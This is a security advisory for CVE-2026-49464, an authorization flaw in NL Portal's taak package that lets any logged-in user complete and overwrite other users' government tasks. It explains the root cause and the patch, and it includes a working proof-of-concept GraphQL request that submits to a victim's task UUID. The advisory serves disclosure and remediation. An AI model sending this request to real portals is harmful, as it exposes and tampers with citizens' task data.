high · 8.1CVE-2026-49464Jul 8, 2026

CVE-2026-49464: NL Portal Taak IDOR Allows Takeover of Any User's Open Task

Rohit Hatagale
AI Security Researcher, SecureLayer7

Any logged-in user of NL Portal can complete or tamper with another user's open government task by sending the victim's task UUID to an unprotected GraphQL mutation, leaking and overwriting the victim

Packagenl.nl-portal:taak
Ecosystemmaven
Affected>= 1.5.0, <= 3.0.0
Fixed in3.0.1

The problem

The `submitTaakV2` GraphQL mutation in `nl.nlportal.zgw.taak.service.TaakService` accepted a task UUID and a form submission, then immediately marked the task `AFGEROND` (completed) and wrote caller-supplied data into `record.data.portaalformulier.verzondenData`.

No check verified that the task's `identificatie` matched the authenticated user. Any valid OAuth `burger` token was enough to complete or overwrite tasks belonging to anyone else, and the mutation response returned the full task record, exposing whatever the legitimate owner had already filled in.

Proof of concept

A working proof-of-concept for CVE-2026-49464 in nl.nl-portal:taak, with the exact payload below.

http
# Attacker holds a valid burger OAuth token.
# VICTIM_TASK_ID is any UUID the attacker knows or guesses.

POST /graphql HTTP/1.1
Host: portal.example.nl
Authorization: Bearer <attacker_burger_token>
Content-Type: application/json

{
  "query": "mutation { submitTaakV2(id: \"VICTIM_TASK_ID\", submission: { field1: \"attacker_value\" }) { id status data { portaalformulier { verzondenData } } } }"
}

The root cause is CWE-639 (Authorization Bypass Through User-Controlled Key): the service looked up the task object by the caller-supplied UUID and acted on it without confirming ownership. The UUID was the only key, and it was fully attacker-controlled.

Patch commit `8e699add` introduces `isAuthorizedForTaak(authentication, objectsApiTask)` before the status transition. That helper compares `identificatie.type` and `identificatie.value` against the authenticated principal, and separately validates `eigenaar` for `bedrijf` machtigingen delegation flows.

Any mismatch throws before any data is written or returned.

The fix

Upgrade `nl.nl-portal:taak` to **3.0.1** or later. As a short-term workaround, block or rate-limit the `submitTaakV2` mutation at the API gateway, or restrict the `/graphql` endpoint to trusted internal networks only.

Reporter not attributed.

References: [1][2]

Related research